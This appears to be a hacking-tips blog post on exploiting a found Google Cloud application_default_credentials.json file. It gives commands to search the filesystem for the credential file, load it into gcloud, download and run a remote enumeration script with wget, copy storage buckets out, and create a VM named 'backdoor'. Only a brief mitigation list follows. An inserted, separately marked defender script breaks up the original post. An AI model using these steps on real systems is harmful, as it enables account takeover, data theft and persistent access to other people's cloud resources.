Ethical Hacker Tip: Exploiting Google Cloud application_default_credentials.json


Finding an `application_default_credentials.json` file can grant unauthorized access to Google Cloud resources. The file holds a refresh token tied to a Google identity (a user or a service account), which lets an attacker:
– Generate OAuth2 access tokens
– Access GCP APIs (Cloud Storage, BigQuery, etc.)
– Escalate privileges via IAM roles
– Deploy costly resources (e.g., crypto mining)

You Should Know:

1. Locating the Credentials File

Default path:

~/.config/gcloud/application_default_credentials.json

Search recursively:

find / -name "application_default_credentials.json" 2>/dev/null

2. Exploiting with gCloud CLI

If you obtain the file:

export GOOGLE_APPLICATION_CREDENTIALS="/path/to/json"
gcloud auth list        # Verify active account
gcloud projects list    # Enumerate accessible projects

3. Python Enumeration Script

Download and run Mark’s script:

wget https://raw.githubusercontent.com/Hackertips-today/Google_enum/main/enum.py
python3 enum.py

Dependencies:

pip3 install google-auth google-auth-oauthlib google-auth-httplib2

4. Post-Exploitation Commands

  • List Cloud Storage Buckets:
    gsutil ls

  • Download Bucket Contents:
    gsutil cp -r gs://bucket-name /local/path

  • Spin Up a VM (Caution!):
    gcloud compute instances create backdoor --machine-type=n1-standard-1 --image=ubuntu-2004-focal-v20240415

5. Mitigation (Defenders)

  • Revoke Compromised Tokens:
    gcloud auth revoke --all

  • Audit IAM Roles:
    gcloud projects get-iam-policy PROJECT_ID

What Undercode Says:

The `application_default_credentials.json` file is a goldmine for attackers. Always:
– Restrict token scope via the `--scopes` flag when running `gcloud auth`.
– Monitor GCP Activity Logs for anomalous API calls.
– Use short-lived tokens (`gcloud auth print-access-token`).
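As an added defender-side example (not from the original post or the enumeration script it links), the following Python check does the hygiene counterpart of steps 1 and 5: it walks a directory for ADC files, reports each file's credential type and identity, and flags loose file permissions, without ever printing the secrets. The sample ADC file and every value in it are constructed placeholders.

```python
import json
import os
import stat
import tempfile
from pathlib import Path

ADC_NAME = "application_default_credentials.json"
# Keys whose presence means the file holds a long-lived secret (never print these).
SECRET_KEYS = {"refresh_token", "client_secret", "private_key"}


def inspect_adc(path):
    """Summarise one ADC file for a hygiene report without exposing its secrets."""
    p = Path(path)
    with p.open() as fh:
        data = json.load(fh)
    mode = stat.S_IMODE(p.stat().st_mode)
    # authorized_user files carry a user refresh token; service_account files a private key.
    identity = data.get("client_email") or data.get("client_id", "?")
    return {
        "path": str(p),
        "type": data.get("type", "unknown"),
        "identity": identity,
        "secrets_present": sorted(k for k in SECRET_KEYS if k in data),
        # Any group/other bits let another local user read the token.
        "too_permissive": bool(mode & (stat.S_IRWXG | stat.S_IRWXO)),
        "mode": oct(mode),
    }


def find_adc_files(root):
    """Walk `root` and return every ADC file found (the defender's version of `find /`)."""
    return [os.path.join(d, ADC_NAME) for d, _, files in os.walk(root) if ADC_NAME in files]


def demo():
    """Constructed sample: an authorized_user ADC file with placeholder values, left world-readable."""
    sample = {
        "client_id": "000000000000-example.apps.googleusercontent.com",
        "client_secret": "PLACEHOLDER-SECRET",
        "refresh_token": "PLACEHOLDER-REFRESH-TOKEN",
        "type": "authorized_user",
    }
    with tempfile.TemporaryDirectory() as tmp:
        target = Path(tmp) / ".config" / "gcloud" / ADC_NAME
        target.parent.mkdir(parents=True)
        target.write_text(json.dumps(sample))
        target.chmod(0o644)  # the weak setting: readable by group and others
        return [inspect_adc(f) for f in find_adc_files(tmp)]


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a real home directory by calling `find_adc_files(os.path.expanduser("~"))` instead of `demo()`; a clean result is a file with `too_permissive` False (mode `0o600`).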

Expected Output:

Active account: [email protected]
Projects: 
- my-project-123 (PROJECT_ID)
Buckets:
- gs://sensitive-data-bucket


Reported By: Activity 7315545728943091713 – Hackers Feeds
